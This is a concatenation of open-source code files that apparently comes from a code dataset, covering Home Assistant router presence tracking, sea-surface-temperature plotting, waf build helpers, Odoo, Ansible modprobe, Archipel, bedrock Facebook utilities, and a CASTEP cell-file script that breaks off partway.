if r in (P, Q):
return 1e10 # max val if the same, to skip
return abs((r - P).angle(r - Q))
R = min(points, key=angle_pq)
# check for case 1 (angle PRQ is obtuse), the circle is determined
# by two points, P and Q. radius = |(P-Q)/2|, center = (P+Q)/2
if angle_pq(R) > 90.0:
return (P + Q) * .5, ((P - Q) * .5).length()
# if angle RPQ is obtuse, make P = R, and try again
if abs((R - P).angle(Q - P)) > 90:
P = R
continue
# if angle PQR is obtuse, make Q = R, and try again
if abs((P - Q).angle(R - Q)) > 90:
Q = R
continue
# all angles were acute..we just need the circle through the
# two points furthest apart!
break
# find the circumcenter for triangle given by P,Q,R
return circumcircle(P, Q, R)
| mit |
teodoc/home-assistant | homeassistant/components/device_tracker/luci.py | 10 | 5820 | """
homeassistant.components.device_tracker.luci
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Device tracker platform that supports scanning a OpenWRT router for device
presence.
It's required that the luci RPC package is installed on the OpenWRT router:
# opkg install luci-mod-rpc
Configuration:
To use the Luci tracker you will need to add something like the following
to your config/configuration.yaml
device_tracker:
platform: luci
host: YOUR_ROUTER_IP
username: YOUR_ADMIN_USERNAME
password: YOUR_ADMIN_PASSWORD
Variables:
host
*Required
The IP address of your router, e.g. 192.168.1.1.
username
*Required
The username of an user with administrative privileges, usually 'admin'.
password
*Required
The password for your given admin account.
"""
import logging
import json
from datetime import timedelta
import re
import threading
import requests
from homeassistant.const import CONF_HOST, CONF_USERNAME, CONF_PASSWORD
from homeassistant.helpers import validate_config
from homeassistant.util import Throttle
from homeassistant.components.device_tracker import DOMAIN
# Return cached results if last scan was less then this time ago
MIN_TIME_BETWEEN_SCANS = timedelta(seconds=5)
_LOGGER = logging.getLogger(__name__)
def get_scanner(hass, config):
""" Validates config and returns a Luci scanner. """
if not validate_config(config,
{DOMAIN: [CONF_HOST, CONF_USERNAME, CONF_PASSWORD]},
_LOGGER):
return None
scanner = LuciDeviceScanner(config[DOMAIN])
return scanner if scanner.success_init else None
# pylint: disable=too-many-instance-attributes
class LuciDeviceScanner(object):
""" This class queries a wireless router running OpenWrt firmware
for connected devices. Adapted from Tomato scanner.
# opkg install luci-mod-rpc
for this to work on the router.
The API is described here:
http://luci.subsignal.org/trac/wiki/Documentation/JsonRpcHowTo
(Currently, we do only wifi iwscan, and no DHCP lease access.)
"""
def __init__(self, config):
host = config[CONF_HOST]
username, password = config[CONF_USERNAME], config[CONF_PASSWORD]
self.parse_api_pattern = re.compile(r"(?P<param>\w*) = (?P<value>.*);")
self.lock = threading.Lock()
self.last_results = {}
self.token = _get_token(host, username, password)
self.host = host
self.mac2name = None
self.success_init = self.token is not None
def scan_devices(self):
""" Scans for new devices and return a
list containing found device ids. """
self._update_info()
return self.last_results
def get_device_name(self, device):
""" Returns the name of the given device or None if we don't know. """
with self.lock:
if self.mac2name is None:
url = 'http://{}/cgi-bin/luci/rpc/uci'.format(self.host)
result = _req_json_rpc(url, 'get_all', 'dhcp',
params={'auth': self.token})
if result:
hosts = [x for x in result.values()
if x['.type'] == 'host' and
'mac' in x and 'name' in x]
mac2name_list = [
(x['mac'].upper(), x['name']) for x in hosts]
self.mac2name = dict(mac2name_list)
else:
# Error, handled in the _req_json_rpc
return
return self.mac2name.get(device.upper(), None)
@Throttle(MIN_TIME_BETWEEN_SCANS)
def _update_info(self):
""" Ensures the information from the Luci router is up to date.
Returns boolean if scanning successful. """
if not self.success_init:
return False
with self.lock:
_LOGGER.info("Checking ARP")
url = 'http://{}/cgi-bin/luci/rpc/sys'.format(self.host)
result = _req_json_rpc(url, 'net.arptable',
params={'auth': self.token})
if result:
self.last_results = []
for device_entry in result:
# Check if the Flags for each device contain
# NUD_REACHABLE and if so, add it to last_results
if int(device_entry['Flags'], 16) & 0x2:
self.last_results.append(device_entry['HW address'])
return True
return False
def _req_json_rpc(url, method, *args, **kwargs):
""" Perform one JSON RPC operation. """
data = json.dumps({'method': method, 'params': args})
try:
res = requests.post(url, data=data, timeout=5, **kwargs)
except requests.exceptions.Timeout:
_LOGGER.exception("Connection to the router timed out")
return
if res.status_code == 200:
try:
result = res.json()
except ValueError:
# If json decoder could not parse the response
_LOGGER.exception("Failed to parse response from luci")
return
try:
return result['result']
except KeyError:
_LOGGER.exception("No result in response from luci")
return
elif res.status_code == 401:
# Authentication error
_LOGGER.exception(
"Failed to authenticate, "
"please check your username and password")
return
else:
_LOGGER.error("Invalid response from luci: %s", res)
def _get_token(host, username, password):
""" Get authentication token for the given host+username+password """
url = 'http://{}/cgi-bin/luci/rpc/auth'.format(host)
return _req_json_rpc(url, 'login', username, password)
| mit |
zmlabe/IceVarFigs | Scripts/SeaSurfaceTemperatures/plot_ersst5.py | 1 | 5197 | """
Plot selected years of monthly ERSSTv5 global data
Website : https://www1.ncdc.noaa.gov/pub/data/cmb/ersst/v5/netcdf/
Author : Zachary M. Labe
Date : 22 July 2017
"""
from netCDF4 import Dataset
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap, addcyclic, shiftgrid
import numpy as np
import datetime
import nclcmaps as ncm
### Read in data files from server
directoryfigure = './Figures/'
directorydata = './Data/'
### Define constants
now = datetime.datetime.now()
month = now.month
monthsq = [r'Jan',r'Feb',r'Mar',r'Apr',r'May',r'Jun',r'Jul',
r'Aug',r'Sep',r'Oct',r'Nov',r'Dec',r'Jan']
### Input selected years and months!
years = np.arange(1992,2016+1,1)
months = np.arange(1,12+1,1)
### Read in data
sst = np.empty((years.shape[0],months.shape[0],89,180))
for i in range(years.shape[0]):
for j in range(months.shape[0]):
filename = directorydata + 'ersst.v5.%s%02d.nc' % (years[i],
months[j])
data = Dataset(filename)
lats = data.variables['lat'][:]
lons = data.variables['lon'][:]
sst[i,j,:,:] = data.variables['sst'][0,0,:,:]
data.close()
print('Completed: Read %s year!' % years[i])
### Locate missing data
sst[np.where(sst == -999)] = np.nan
### Reshape data
sst = np.reshape(sst,(300,89,180))
### Create list of years for plotting
yearsqq = np.repeat(years,12)
###############################################################################
###############################################################################
###############################################################################
### Plot figure
### Define parameters (dark)
def setcolor(x, color):
for m in x:
for t in x[m][1]:
t.set_color(color)
plt.rc('text',usetex=True)
plt.rc('font',**{'family':'sans-serif','sans-serif':['Avant Garde']})
plt.rc('savefig',facecolor='black')
plt.rc('axes',edgecolor='k')
plt.rc('xtick',color='white')
plt.rc('ytick',color='white')
plt.rc('axes',labelcolor='white')
plt.rc('axes',facecolor='black')
### Select map type
style = 'global'
if style == 'ortho':
m = Basemap(projection='ortho',lon_0=-90,
lat_0=70,resolution='l',round=True)
elif style == 'polar':
m = Basemap(projection='npstere',boundinglat=67,lon_0=270,resolution='l',round =True)
elif style == 'global':
m = Basemap(projection='moll',lon_0=0,resolution='l',area_thresh=10000)
### Begin loop of years/months
for i in range(sst.shape[0]):
fig = plt.figure()
ax = plt.subplot(111)
for txt in fig.texts:
txt.set_visible(False)
var = sst[i,:,:]
m.drawmapboundary(fill_color='k')
m.drawcoastlines(color='k',linewidth=0.4)
### Colorbar limits
barlim = np.arange(0,31,5)
### Make the plot continuous
var, lons_cyclic = addcyclic(var, lons)
var, lons_cyclic = shiftgrid(180., var, lons_cyclic, start=False)
lon2d, lat2d = np.meshgrid(lons_cyclic, lats)
x, y = m(lon2d, lat2d)
cs = plt.contourf(x,y,var,np.arange(-1.8,31.1,1),
extend='max')
cmap = ncm.cmap('MPL_gnuplot')
cs.set_cmap(cmap)
t = plt.annotate(r'\textbf{%s}' % yearsqq[i],textcoords='axes fraction',
xy=(0,0), xytext=(0.34,1.03),
fontsize=50,color='w',alpha=0.6)
t1 = plt.annotate(r'\textbf{GRAPHIC}: Zachary Labe (@ZLabe)',
textcoords='axes fraction',
xy=(0,0), xytext=(0.02,-0.167),
fontsize=4.5,color='w',alpha=0.6)
t2 = plt.annotate(r'\textbf{SOURCE}: https://www1.ncdc.noaa.gov/',
textcoords='axes fraction',
xy=(0,0), xytext=(0.02,-0.197),
fontsize=4.5,color='w',alpha=0.6)
t3 = plt.annotate(r'\textbf{DATA}: NOAA ERSSTv5, Huang et al. (2017)',
textcoords='axes fraction',
xy=(0,0), xytext=(0.02,-0.227),
fontsize=4.5,color='w',alpha=0.6)
t4 = plt.annotate(r'\textbf{SEA SURFACE TEMPERATURES}',
textcoords='axes fraction',
xy=(0,0), xytext=(0.24,-0.036),fontsize=13,color='w',alpha=0.6)
m.fillcontinents(color='k')
cbar = plt.colorbar(cs,drawedges=False,orientation='horizontal',
pad = 0.04,fraction=0.035)
cbar.set_ticks(barlim)
cbar.set_ticklabels(list(map(str,barlim)))
cbar.set_label(r'\textbf{$\bf{^\circ}$\textbf{C}}',fontsize=13,
color='w')
cbar.ax.tick_params(axis='x', size=.001)
cbar.ax.tick_params(labelsize=6)
plt.subplots_adjust(bottom=0.2)
### Save figure to create animation using ImageMagick
if i < 10:
plt.savefig(directoryfigure + 'sstq_00%s.png' % (i),
dpi=200)
elif i < 100:
plt.savefig(directoryfigure + 'sstq_0%s.png' % (i),
dpi=200)
else:
plt.savefig(directoryfigure + 'sstq_%s.png' % (i),
dpi=200)
### Remove text for each figure
t.remove()
t1.remove()
t2.remove()
t3.remove()
t4.remove() | mit |
Chiru/NVE_Simulation | NS3/waf-tools/misc.py | 69 | 11666 | #!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2006-2010 (ita)
"""
This tool is totally deprecated
Try using:
.pc.in files for .pc files
the feature intltool_in - see demos/intltool
make-like rules
"""
import shutil, re, os
from waflib import TaskGen, Node, Task, Utils, Build, Errors
from waflib.TaskGen import feature, after_method, before_method
from waflib.Logs import debug
def copy_attrs(orig, dest, names, only_if_set=False):
"""
copy class attributes from an object to another
"""
for a in Utils.to_list(names):
u = getattr(orig, a, ())
if u or not only_if_set:
setattr(dest, a, u)
def copy_func(tsk):
"Make a file copy. This might be used to make other kinds of file processing (even calling a compiler is possible)"
env = tsk.env
infile = tsk.inputs[0].abspath()
outfile = tsk.outputs[0].abspath()
try:
shutil.copy2(infile, outfile)
except (OSError, IOError):
return 1
else:
if tsk.chmod: os.chmod(outfile, tsk.chmod)
return 0
def action_process_file_func(tsk):
"Ask the function attached to the task to process it"
if not tsk.fun: raise Errors.WafError('task must have a function attached to it for copy_func to work!')
return tsk.fun(tsk)
@feature('cmd')
def apply_cmd(self):
"call a command everytime"
if not self.fun: raise Errors.WafError('cmdobj needs a function!')
tsk = Task.TaskBase()
tsk.fun = self.fun
tsk.env = self.env
self.tasks.append(tsk)
tsk.install_path = self.install_path
@feature('copy')
@before_method('process_source')
def apply_copy(self):
Utils.def_attrs(self, fun=copy_func)
self.default_install_path = 0
lst = self.to_list(self.source)
self.meths.remove('process_source')
for filename in lst:
node = self.path.find_resource(filename)
if not node: raise Errors.WafError('cannot find input file %s for processing' % filename)
target = self.target
if not target or len(lst)>1: target = node.name
# TODO the file path may be incorrect
newnode = self.path.find_or_declare(target)
tsk = self.create_task('copy', node, newnode)
tsk.fun = self.fun
tsk.chmod = getattr(self, 'chmod', Utils.O644)
if not tsk.env:
tsk.debug()
raise Errors.WafError('task without an environment')
def subst_func(tsk):
"Substitutes variables in a .in file"
m4_re = re.compile('@(\w+)@', re.M)
code = tsk.inputs[0].read() #Utils.readf(infile)
# replace all % by %% to prevent errors by % signs in the input file while string formatting
code = code.replace('%', '%%')
s = m4_re.sub(r'%(\1)s', code)
env = tsk.env
di = getattr(tsk, 'dict', {}) or getattr(tsk.generator, 'dict', {})
if not di:
names = m4_re.findall(code)
for i in names:
di[i] = env.get_flat(i) or env.get_flat(i.upper())
tsk.outputs[0].write(s % di)
@feature('subst')
@before_method('process_source')
def apply_subst(self):
Utils.def_attrs(self, fun=subst_func)
lst = self.to_list(self.source)
self.meths.remove('process_source')
self.dict = getattr(self, 'dict', {})
for filename in lst:
node = self.path.find_resource(filename)
if not node: raise Errors.WafError('cannot find input file %s for processing' % filename)
if self.target:
newnode = self.path.find_or_declare(self.target)
else:
newnode = node.change_ext('')
try:
self.dict = self.dict.get_merged_dict()
except AttributeError:
pass
if self.dict and not self.env['DICT_HASH']:
self.env = self.env.derive()
keys = list(self.dict.keys())
keys.sort()
lst = [self.dict[x] for x in keys]
self.env['DICT_HASH'] = str(Utils.h_list(lst))
tsk = self.create_task('copy', node, newnode)
tsk.fun = self.fun
tsk.dict = self.dict
tsk.dep_vars = ['DICT_HASH']
tsk.chmod = getattr(self, 'chmod', Utils.O644)
if not tsk.env:
tsk.debug()
raise Errors.WafError('task without an environment')
####################
## command-output ####
####################
class cmd_arg(object):
"""command-output arguments for representing files or folders"""
def __init__(self, name, template='%s'):
self.name = name
self.template = template
self.node = None
class input_file(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_resource(self.name)
if self.node is None:
raise Errors.WafError("Input file %s not found in " % (self.name, base_path))
def get_path(self, env, absolute):
if absolute:
return self.template % self.node.abspath()
else:
return self.template % self.node.srcpath()
class output_file(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_or_declare(self.name)
if self.node is None:
raise Errors.WafError("Output file %s not found in " % (self.name, base_path))
def get_path(self, env, absolute):
if absolute:
return self.template % self.node.abspath()
else:
return self.template % self.node.bldpath()
class cmd_dir_arg(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_dir(self.name)
if self.node is None:
raise Errors.WafError("Directory %s not found in " % (self.name, base_path))
class input_dir(cmd_dir_arg):
def get_path(self, dummy_env, dummy_absolute):
return self.template % self.node.abspath()
class output_dir(cmd_dir_arg):
def get_path(self, env, dummy_absolute):
return self.template % self.node.abspath()
class command_output(Task.Task):
color = "BLUE"
def __init__(self, env, command, command_node, command_args, stdin, stdout, cwd, os_env, stderr):
Task.Task.__init__(self, env=env)
assert isinstance(command, (str, Node.Node))
self.command = command
self.command_args = command_args
self.stdin = stdin
self.stdout = stdout
self.cwd = cwd
self.os_env = os_env
self.stderr = stderr
if command_node is not None: self.dep_nodes = [command_node]
self.dep_vars = [] # additional environment variables to look
def run(self):
task = self
#assert len(task.inputs) > 0
def input_path(node, template):
if task.cwd is None:
return template % node.bldpath()
else:
return template % node.abspath()
def output_path(node, template):
fun = node.abspath
if task.cwd is None: fun = node.bldpath
return template % fun()
if isinstance(task.command, Node.Node):
argv = [input_path(task.command, '%s')]
else:
argv = [task.command]
for arg in task.command_args:
if isinstance(arg, str):
argv.append(arg)
else:
assert isinstance(arg, cmd_arg)
argv.append(arg.get_path(task.env, (task.cwd is not None)))
if task.stdin:
stdin = open(input_path(task.stdin, '%s'))
else:
stdin = None
if task.stdout:
stdout = open(output_path(task.stdout, '%s'), "w")
else:
stdout = None
if task.stderr:
stderr = open(output_path(task.stderr, '%s'), "w")
else:
stderr = None
if task.cwd is None:
cwd = ('None (actually %r)' % os.getcwd())
else:
cwd = repr(task.cwd)
debug("command-output: cwd=%s, stdin=%r, stdout=%r, argv=%r" %
(cwd, stdin, stdout, argv))
if task.os_env is None:
os_env = os.environ
else:
os_env = task.os_env
command = Utils.subprocess.Popen(argv, stdin=stdin, stdout=stdout, stderr=stderr, cwd=task.cwd, env=os_env)
return command.wait()
@feature('command-output')
def init_cmd_output(self):
Utils.def_attrs(self,
stdin = None,
stdout = None,
stderr = None,
# the command to execute
command = None,
# whether it is an external command; otherwise it is assumed
# to be an executable binary or script that lives in the
# source or build tree.
command_is_external = False,
# extra parameters (argv) to pass to the command (excluding
# the command itself)
argv = [],
# dependencies to other objects -> this is probably not what you want (ita)
# values must be 'task_gen' instances (not names!)
dependencies = [],
# dependencies on env variable contents
dep_vars = [],
# input files that are implicit, i.e. they are not
# stdin, nor are they mentioned explicitly in argv
hidden_inputs = [],
# output files that are implicit, i.e. they are not
# stdout, nor are they mentioned explicitly in argv
hidden_outputs = [],
# change the subprocess to this cwd (must use obj.input_dir() or output_dir() here)
cwd = None,
# OS environment variables to pass to the subprocess
# if None, use the default environment variables unchanged
os_env = None)
@feature('command-output')
@after_method('init_cmd_output')
def apply_cmd_output(self):
if self.command is None:
raise Errors.WafError("command-output missing command")
if self.command_is_external:
cmd = self.command
cmd_node = None
else:
cmd_node = self.path.find_resource(self.command)
assert cmd_node is not None, ('''Could not find command '%s' in source tree.
Hint: if this is an external command,
use command_is_external=True''') % (self.command,)
cmd = cmd_node
if self.cwd is None:
cwd = None
args = []
inputs = []
outputs = []
for arg in self.argv:
if isinstance(arg, cmd_arg):
arg.find_node(self.path)
if isinstance(arg, input_file):
inputs.append(arg.node)
if isinstance(arg, output_file):
outputs.append(arg.node)
if self.stdout is None:
stdout = None
else:
assert isinstance(self.stdout, str)
stdout = self.path.find_or_declare(self.stdout)
if stdout is None:
raise Errors.WafError("File %s not found" % (self.stdout,))
outputs.append(stdout)
if self.stderr is None:
stderr = None
else:
assert isinstance(self.stderr, str)
stderr = self.path.find_or_declare(self.stderr)
if stderr is None:
raise Errors.WafError("File %s not found" % (self.stderr,))
outputs.append(stderr)
if self.stdin is None:
stdin = None
else:
assert isinstance(self.stdin, str)
stdin = self.path.find_resource(self.stdin)
if stdin is None:
raise Errors.WafError("File %s not found" % (self.stdin,))
inputs.append(stdin)
for hidden_input in self.to_list(self.hidden_inputs):
node = self.path.find_resource(hidden_input)
if node is None:
raise Errors.WafError("File %s not found in dir %s" % (hidden_input, self.path))
inputs.append(node)
for hidden_output in self.to_list(self.hidden_outputs):
node = self.path.find_or_declare(hidden_output)
if node is None:
raise Errors.WafError("File %s not found in dir %s" % (hidden_output, self.path))
outputs.append(node)
if not (inputs or getattr(self, 'no_inputs', None)):
raise Errors.WafError('command-output objects must have at least one input file or give self.no_inputs')
if not (outputs or getattr(self, 'no_outputs', None)):
raise Errors.WafError('command-output objects must have at least one output file or give self.no_outputs')
cwd = self.bld.variant_dir
task = command_output(self.env, cmd, cmd_node, self.argv, stdin, stdout, cwd, self.os_env, stderr)
task.generator = self
copy_attrs(self, task, 'before after ext_in ext_out', only_if_set=True)
self.tasks.append(task)
task.inputs = inputs
task.outputs = outputs
task.dep_vars = self.to_list(self.dep_vars)
for dep in self.dependencies:
assert dep is not self
dep.post()
for dep_task in dep.tasks:
task.set_run_after(dep_task)
if not task.inputs:
# the case for svnversion, always run, and update the output nodes
task.runnable_status = type(Task.TaskBase.run)(runnable_status, task, task.__class__) # always run
task.post_run = type(Task.TaskBase.run)(post_run, task, task.__class__)
# TODO the case with no outputs?
def post_run(self):
for x in self.outputs:
x.sig = Utils.h_file(x.abspath())
def runnable_status(self):
return self.RUN_ME
Task.task_factory('copy', vars=[], func=action_process_file_func)
| bsd-3-clause |
CompassionCH/compassion-modules | gift_compassion/wizards/collect_gifts_wizard.py | 4 | 1439 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2014 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <[email protected]>
#
# The licence is in the file __manifest__.py
#
##############################################################################
from odoo import api, fields, models
from odoo.tools import safe_eval
class CollectGiftWizard(models.TransientModel):
""" This wizard generates a Gift Invoice for a given contract. """
_name = 'gift.collect.wizard'
invoice_line_ids = fields.Many2many(
'account.invoice.line', string='Invoice lines',
)
domain = fields.Char(
default="[('product_id.name', '=', 'Child gift'),"
" ('state', '=', 'paid'),"
" ('gift_id', '=', False)]"
)
@api.onchange('domain')
def apply_domain(self):
return {
'domain': {'invoice_line_ids': safe_eval(self.domain)}
}
@api.multi
def collect_invoices(self):
# Read data in english
self.ensure_one()
gift = self.env['sponsorship.gift'].browse(
self.env.context['active_id'])
self.invoice_line_ids.write({'gift_id': gift.id})
return gift.write({
'invoice_line_ids': [(4, id) for id in self.invoice_line_ids.ids]
})
| agpl-3.0 |
CydarLtd/ansible | lib/ansible/modules/system/modprobe.py | 69 | 3813 | #!/usr/bin/python
#coding: utf-8 -*-
# (c) 2013, David Stygstra <[email protected]>
#
# This file is part of Ansible
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: modprobe
short_description: Add or remove kernel modules
requirements: []
version_added: 1.4
author:
- "David Stygstra (@stygstra)"
- "Julien Dauphant"
- "Matt Jeffery"
description:
- Add or remove kernel modules.
options:
name:
required: true
description:
- Name of kernel module to manage.
state:
required: false
default: "present"
choices: [ present, absent ]
description:
- Whether the module should be present or absent.
params:
required: false
default: ""
version_added: "1.6"
description:
- Modules parameters.
'''
EXAMPLES = '''
# Add the 802.1q module
- modprobe:
name: 8021q
state: present
# Add the dummy module
- modprobe:
name: dummy
state: present
params: 'numdummies=2'
'''
from ansible.module_utils.basic import *
from ansible.module_utils.pycompat24 import get_exception
import shlex
def main():
module = AnsibleModule(
argument_spec={
'name': {'required': True},
'state': {'default': 'present', 'choices': ['present', 'absent']},
'params': {'default': ''},
},
supports_check_mode=True,
)
args = {
'changed': False,
'failed': False,
'name': module.params['name'],
'state': module.params['state'],
'params': module.params['params'],
}
# Check if module is present
try:
modules = open('/proc/modules')
present = False
module_name = args['name'].replace('-', '_') + ' '
for line in modules:
if line.startswith(module_name):
present = True
break
modules.close()
except IOError:
e = get_exception()
module.fail_json(msg=str(e), **args)
# Check only; don't modify
if module.check_mode:
if args['state'] == 'present' and not present:
changed = True
elif args['state'] == 'absent' and present:
changed = True
else:
changed = False
module.exit_json(changed=changed)
# Add/remove module as needed
if args['state'] == 'present':
if not present:
command = [module.get_bin_path('modprobe', True), args['name']]
command.extend(shlex.split(args['params']))
rc, _, err = module.run_command(command)
if rc != 0:
module.fail_json(msg=err, **args)
args['changed'] = True
elif args['state'] == 'absent':
if present:
rc, _, err = module.run_command([module.get_bin_path('modprobe', True), '-r', args['name']])
if rc != 0:
module.fail_json(msg=err, **args)
args['changed'] = True
module.exit_json(**args)
if __name__ == '__main__':
main()
| gpl-3.0 |
CyrilPeponnet/Archipel | ArchipelAgent/archipel-agent-action-scheduler/archipelagentactionscheduler/__init__.py | 5 | 2236 | # -*- coding: utf-8 -*-
#
# __init__.py
#
# Copyright (C) 2010 Antoine Mercadal <[email protected]>
# Copyright, 2011 - Franck Villaume <[email protected]>
# This file is part of ArchipelProject
# http://archipelproject.org
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import actionscheduler
def make_archipel_plugin(configuration, entity, group):
"""
This function is the plugin factory. It will be called by the object you want
to be plugged in. It must return a list whit at least on dictionary containing
a key for the the plugin informations, and a key for the plugin object.
@type configuration: Config Object
@param configuration: the general configuration object
@type entity: L{TNArchipelEntity}
@param entity: the entity that has load the plugin
@type group: string
@param group: the entry point group name in which the plugin has been loaded
@rtype: array
@return: array of dictionary containing the plugins informations and objects
"""
return [{"info": actionscheduler.TNActionScheduler.plugin_info(),
"plugin": actionscheduler.TNActionScheduler(configuration, entity, group)}]
def version():
"""
This function can be called runarchipel -v in order to get the version of the
installed plugin. You only should have to change the egg name.
@rtype: tupple
@return: tupple containing the package name and the version
"""
import pkg_resources
return (__name__, pkg_resources.get_distribution("archipel-agent-action-scheduler").version, [actionscheduler.TNActionScheduler.plugin_info()]) | agpl-3.0 |
yglazko/bedrock | bedrock/facebookapps/utils.py | 21 | 3549 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import json
import urllib
from base64 import urlsafe_b64decode
from django.conf import settings
from django.utils.translation import get_language
import commonware.log
import tower
from lib import l10n_utils
log = commonware.log.getLogger('facebookapps.utils')
def unwrap_signed_request(request):
"""
Decodes and returns Facebook's `signed_request` data.
See https://developers.facebook.com/docs/howtos/login/signed-request/
"""
try:
encoded_signed_request = request.REQUEST['signed_request']
except KeyError:
return {}
encoded_string_data = encoded_signed_request.partition('.')[2]
# Pad with `=` to make string length a multiple of 4
# and thus prevent a base64 error
padding = ''.ljust(4 - len(encoded_string_data) % 4, '=')
padded_string = ''.join([encoded_string_data, padding])
# Convert to byte data for base64
encoded_byte_data = bytes(padded_string)
signed_request = json.loads(urlsafe_b64decode(encoded_byte_data))
# Change Facebook locale's underscore to hyphen
# ex. `en_US` to `en-US`
try:
locale = signed_request['user']['locale']
except KeyError:
locale = None
if locale:
signed_request['user']['locale'] = locale.replace('_', '-')
return signed_request
def app_data_query_string_encode(app_data):
return urllib.urlencode([('app_data[{key}]'.format(key=key), value)
for key, value in app_data.items()])
def get_best_locale(locale):
"""
Returns the most appropriate locale from the list of supported locales.
This can either be the locale itself (if it's supported), the main locale
for that language if any or failing any of that the default `en-US`.
Adapted from `activate_locale` in Affiliates (http://bit.ly/17if6nh).
"""
# Compare using lowercase locales since they become lowercase once
# activated.
supported_locales = [loc.lower() for loc in settings.FACEBOOK_LOCALES]
# HACK: It's not totally clear to me where Django or tower do the matching
# that equates locales like es-LA to es, and I'm scared enough of getting
# it wrong to want to avoid it for the first release. So instead, we'll
# activate the requested locale, and then check what locale got chosen by
# django as the usable locale, and match that against our locale
# whitelist.
# TODO: Properly filter out locales prior to calling activate.
old_locale = get_language()
tower.activate(locale)
lang = get_language()
if lang.lower() not in supported_locales:
# Try to activate just the language and use the resulting locale
lang_prefix = lang.split('-')[0]
tower.activate(lang_prefix)
lang = get_language()
if lang.lower() not in supported_locales:
# Finally, try to find a locale with that language in the supported
# locales. Otherwise, use default en-US.
try:
lang = next(locale for locale in settings.FACEBOOK_LOCALES
if locale.startswith(lang_prefix))
except StopIteration:
lang = 'en-US'
tower.activate(old_locale)
return lang
def js_redirect(redirect_url, request):
return l10n_utils.render(request, 'facebookapps/js-redirect.html',
{'redirect_url': redirect_url})
| mpl-2.0 |
kaneod/physics | python/castep_special_atom.py | 2 | 11802 | #!/usr/bin/env python
################################################################################
#
# castep_special_atom.py
#
# Version 2.0
#
# Usage castep_special_atom.py SEED Z n
#
# Takes a .cell file SEED.cell, reads it in, changes the "nth" atom of type Z
# to Zspec, writes the file to SEED_special.cell with otherwise no changes.
#
# Designed for calculations where you have to repeat a calculation over all atoms
# of type Z with minor modifications to the pseudopotential for one special atom.
#
################################################################################
#
# Copyright 2013 Kane O'Donnell
#
# This library is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
#
################################################################################
#
# NOTES
#
# 1. WHY DID I NOT USE ESC_LIB? Because esc_lib.py has scipy dependencies that
# make it hard to get running on a cluster where the default python is from the
# dark ages and installing scipy is a pain anyway.
#
# 2. WHY DID I NOT JUST USE THE SAME DAMN ALGORITHMS AS ESC_LIB? Because it's
# a couple of years later and I have better ways of doing things now.
#
# 3. I did reuse SOME bits of esc_lib, ok? :o)
#
################################################################################
# This will fail on old python versions but is fine for 2.6 and 2.7
from __future__ import division
import argparse
# Debugging flag - set to 1 to see debug messages.
DEBUG=1
# SPECIAL text - what do you want added after the atomic Z to show it as special?
SPECIAL=":exc"
# Element dictionary - note that element 0 is given the UKN moniker.
elements = { 1 : "H", 2 : "He", 3 : "Li", 4 : "Be", 5 : "B", 6 : "C", 7 : "N", \
8 : "O", 9 : "F", 10 : "Ne", 11 : "Na", 12 : "Mg", 13 : "Al", 14 : "Si", \
15 : "P", 16 : "S", 17 : "Cl", 18 : "Ar", 19 : "K", 20 : "Ca", 21 : "Sc", \
22 : "Ti", 23 : "V", 24 : "Cr", 25 : "Mn", 26 : "Fe", 27 : "Co", 28 : "Ni", \
29 : "Cu", 30 : "Zn", 31 : "Ga", 32 : "Ge", 33 : "As", 34 : "Se", \
35 : "Br", 36 : "Kr", 37 : "Rb", 38 : "Sr", 39 : "Y", 40 : "Zr", 41 : "Nb", \
42 : "Mo", 43 : "Tc", 44 : "Ru", 45 : "Rh", 46 : "Pd", 47 : "Ag", \
48 : "Cd", 49 : "In", 50 : "Sn", 51 : "Sb", 52 : "Te", 53 : "I", 54 : "Xe", \
55 : "Cs", 56 : "Ba", 57 : "La", 58 : "Ce", 59 : "Pr", 60 : "Nd", \
61 : "Pm", 62 : "Sm", 63 : "Eu", 64 : "Gd", 65 : "Tb", 66 : "Dy", \
67 : "Ho", 68 : "Er", 69 : "Tm", 70 : "Yb", 71 : "Lu", \
72 : "Hf", 73 : "Ta", 74 : "W", 75 : "Re", 76 : "Os", 77 : "Ir", 78 : "Pt", \
79 : "Au", 80 : "Hg", 81 : "Tl", 82 : "Pb", 83 : "Bi", 84 : "Po", \
85 : "At", 86 : "Rn", 87 : "Fr", 88 : "Ra", 89 : "Ac", 90 : "Th", \
91 : "Pa", 92 : "U", 93 : "Np", 94 : "Pu", 95 : "Am", 96 : "Cm", 97 : "Bk", \
